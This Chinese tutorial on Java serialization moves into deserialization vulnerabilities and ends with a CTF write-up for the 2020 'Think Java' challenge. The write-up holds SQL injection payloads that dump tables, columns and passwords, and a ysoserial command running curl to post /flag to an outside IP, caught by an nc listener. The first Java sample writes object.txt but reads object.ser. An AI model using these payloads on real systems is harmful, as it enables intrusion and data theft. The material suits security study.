定义
序列化 (Serialization):将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对 象将其当前状态写入到临时或持久性存储区。 反序列化:从存储区中读取该数据,并将其还原为对象的过程,称为反序列化。 我们可以把对象序列化为不同的格式,比如说,Json序列化、XML序列化、二进制序列化、SOAP序列化等,以上这些不同的格式也都是为了适应具体的业务需求。
用途
把对象的字节序列永久地保存到硬盘上,通常存放在一个文件中; 在网络上传送对象的字节序列。
应用场景
- 一般来说,服务器启动后,就不会再关闭了,但是如果逼不得已需要重启,而用户会话还在进行相应的操作,这时就需要使用序列化将session信息保存起来放在硬盘,服务器重启后,又重新加载。这样就保证了用户信息不会丢失,实现永久化保存。
在很多应用中,需要对某些对象进行序列化,让它们离开内存空间,入住物理硬盘,以便减轻内存压力或便于长期保存。 比如最常见的是Web服务器中的Session对象,当有 10万用户并发访问,就有可能出现10万个Session对象,内存可能吃不消,于是Web容器就会把一些seesion先序列化到硬盘中,等要用了,再把保存在硬盘中的对象还原到内存中。
例子: 淘宝每年都会有定时抢购的活动,很多用户会提前登录等待,长时间不进行操作,一致保存在内存中,而到达指定时刻,几十万用户并发访问,就可能会有几十万个session,内存可能吃不消。这时就需要进行对象的活化、钝化,让其在闲置的时候离开内存,将信息保存至硬盘,等要用的时候,就重新加载进内存。
Java中的序列化和反序列化API实现
Java.io.ObjectOutputStream java.io.ObjectInputStream 序列化: ObjectOutputStream类 --> writeObject()
注:该方法对参数指定的obj对象进行序列化,把字节序列写到一个目标输出流中
按Java的标准约定是给文件一个.ser扩展名
反序列化: ObjectInputStream类 --> readObject()
注:该方法从一个源输入流中读取字节序列,再把它们反序列化为一个对象,并将其返回。
简单测试代码
writeObject()
import java.io.*;
public class Java_Test{
public static void main(String args[]) throws Exception {
String obj = "666";
FileOutputStream fos = new FileOutputStream("C:\\Users\\lenovo\\Desktop\\object.txt");
ObjectOutputStream os = new ObjectOutputStream(fos);
os.writeObject(obj);
os.close();
FileInputStream fis = new FileInputStream("C:\\Users\\lenovo\\Desktop\\object.ser");
ObjectInputStream ois = new ObjectInputStream(fis);
String obj2 = (String)ois.readObject();
System.out.println(obj2);
ois.close();
}
}
object.ser 我们可以看到,先通过输入流创建一个文件,再调用ObjectOutputStream类的 writeObject方法把序列化的数据写入该文件;然后调用ObjectInputStream类的readObject方法反序列化数据并打印数据内容。 Java输出流FileOutputStream使用详解 ObjectOutputStream:对象的序列化流
Serializable和Externalizable
实现Serializable和Externalizable接口的类的对象才能被序列化。
Externalizable接口继承自 Serializable接口,实现Externalizable接口的类完全由自身来控制序列化的行为,而仅实现Serializable接口的类可以采用默认的序列化方式 。 对象序列化包括如下步骤: 1) 创建一个对象输出流,它可以包装一个其他类型的目标输出流,如文件输出流; 2) 通过对象输出流的writeObject()方法写对象。
对象反序列化的步骤如下: 1) 创建一个对象输入流,它可以包装一个其他类型的源输入流,如文件输入流; 2) 通过对象输入流的readObject()方法读取对象。 我们创建一个Person接口,然后写两个方法: 序列化方法: 创建一个Person实例,调用函数为其三个成员变量赋值,通过writeObject方法把该对象序列化,写入Person.txt文件中 反序列化方法:调用readObject方法,返回一个经过反序列化处理的对象 在测试主类里面,我们先序列化Person实例对象,然后又反序列化该对象,最后调用函数获取各个成员变量的值。 示例代码:
import java.io.File;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.text.MessageFormat;
import java.io.Serializable;
class Person implements Serializable {
private static final long serialVersionUID = -5809782578272943999L;
private int age;
private String name;
private String sex;
public int getAge() {
return age;
}
public String getName() {
return name;
}
public String getSex() {
return sex;
}
public void setAge(int age) {
this.age = age;
}
public void setName(String name) {
this.name = name;
}
public void setSex(String sex) {
this.sex = sex;
}
}
public class SerializeDeserialize_readObject {
public static void main(String[] args) throws Exception {
SerializePerson();
Person p = DeserializePerson();
System.out.println(MessageFormat.format("name={0},age={1},sex={2}",
p.getName(), p.getAge(), p.getSex()));
}
private static void SerializePerson() throws FileNotFoundException,
IOException {
Person person = new Person();
person.setName("hacker");
person.setAge(20);
person.setSex("男");
ObjectOutputStream oo = new ObjectOutputStream(new FileOutputStream(
new File("Person.txt")));
oo.writeObject(person);
System.out.println("Person对象序列化成功!");
oo.close();
}
private static Person DeserializePerson() throws Exception, IOException {
ObjectInputStream ois = new ObjectInputStream(new FileInputStream(new File("Person.txt")));
Person person = (Person) ois.readObject();
System.out.println("Person对象反序列化成功!");
return person;
}
}
序列化ID的作用
序列化ID起着关键的作用,java的序列化机制是通过在运行时判断类的serialVersionUID来验证版本一致性的。反序列化时,JVM会把传来的字节流中的serialVersionUID与本地实体类中的serialVersionUID进行比较,如果相同则认为是一致的,便可以进行反序列化,否则就会报序列化版本不一致的异常。
漏洞原理
我们既然已经知道了序列化与反序列化的过程,那么如果反序列化的时候,这些即将被反序列化的数据是我们特殊构造的呢! 如果Java应用对用户输入,即不可信数据做了反序列化处理,那么攻击者可以通过构造恶意输入,让反序列化产生非预期的对象,非预期的对象在产生过程中就有可能带来任意代码执行。
漏洞挖掘
漏洞触发场景
在java编写的web应用与web服务器间java通常会发送大量的序列化对象例如以下场景: HTTP请求中的参数,cookies以及Parameters。 RMI协议,被广泛使用的RMI协议完全基于序列化 JMX 同样用于处理序列化对象 自定义协议 用来接收与发送原始的java对象
挖掘方法
(1)确定反序列化输入点 首先应找出readObject方法调用,在找到之后进行下一步的注入操作。 一般可以通过以下方法进行查找: 源码审计:寻找可以利用的“靶点”,即确定调用反序列化函数readObject的调用地点。 对该应用进行网络行为抓包,寻找序列化数据,如wireshark,tcpdump等 (2)再考察应用的Class Path中是否包含Apache Commons Collections库 (3)生成反序列化的payload (4)提交我们的payload数据
[网鼎杯 2020 朱雀组]Think Java
1、这里导入了springframework包,springframework 是spring 里面的一个开源框架,Swagger UI:提供了一个可视化的UI页面展示描述文件。接口的调用方、测试、项目经理等都可以在该页面中对相关接口进行查阅和做一些简单的接口请求。该项目支持在线导入描述文件和本地部署UI项目。扫描得到swagger-ui.html
存在三个路由 2、审计源码发现sqlDict类中有个sql注入 先去sql注入的/common/test/sqlDict看看 首先要保证。连接数据库的时候不报错 jdbc类似URL解析。所以当我们输入myapp#' union select 1# 时 #在URL中是锚点。所以
jdbc:mysql://mysqldbserver:3306/myapp#' union select 1#
会被解析成
jdbc:mysql://mysqldbserver:3306/myapp
再带入sql语句
Select TABLE_COMMENT from INFORMATION_SCHEMA.TABLES Where table_schema = '#' union select 1#' and table_name='" + TableName + "'
第一个#被单引号包裹。成了普通的#字符。第二个#注释掉了后面的语句。造成sql注入
myapp为数据库名在如下代码审计发现的
3、payload后,发现在下处回显 4、爆数据表 payload
myapp#' union select ( select group_concat(table_name) from information_schema.tables where table_schema='myapp')#
5、爆列 payload
myapp#' union select ( select group_concat(column_name) from information_schema.columns where table_name='user')#
6、爆数据 payload
myapp#' union select ( select group_concat(name) from user)#
myapp#' union select ( select group_concat(pwd) from user)#
7、把用户密码注出来 admin/admin@Rrrr_ctf_asde 拿去登录
8、发现响应头里有一段经过base64编码的java反序列化的内容 下方的特征可以作为序列化的标志参考: 一段数据以rO0AB开头,你基本可以确定这串就是Java序列化base64加密的数据。 或者如果以aced开头,那么他就是这一段Java序列化的16进制。
9、分析数据: 先利用 py2 脚本 base64 解密数据 import base64 a = “rO0ABXNyABhjbi5hYmMuY29yZS5tb2RlbC5Vc2VyVm92RkMxewT0OgIAAkwAAmlkdAAQTGphdmEvbGFu Zy9Mb25nO0wABG5hbWV0ABJMamF2YS9sYW5nL1N0cmluZzt4cHNyAA5qYXZhLmxhbmcuTG9uZzuL5JDM jyPfAgABSgAFdmFsdWV4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAAAAAAAAXQABWFkb Wlu” b = base64.b64decode(a).encode(‘hex’) print(b)
10、再利用 SerializationDumper 解析数据 java -jar SerializationDumper.jar base64 后的数据
11、 生成反序列化 payload 解密后数据中包含帐号等信息,通过接口/common/user/current 分析可知数据有接受,说明存在反 序列化操作,思路:将恶意代码进行序列化后进行后续操作
12、利用 ysoserial 进行序列化生成 java -jar ysoserial-master-30099844c6-1.jar ROME “curl http://47.75.212.155:4444 -d @/flag” > xiaodi.bin
13、利用 py2 脚本进行反序列化数据的提取 import base64 file = open(“xiaodi.bin”,“rb”) now = file.read() ba = base64.b64encode(now) print(ba) file.close() 0x05 触发反序列化,获取 flag
14、服务器执行:nc -lvvp 4444 数据包直接请求获取进行反序列数据加载操作
|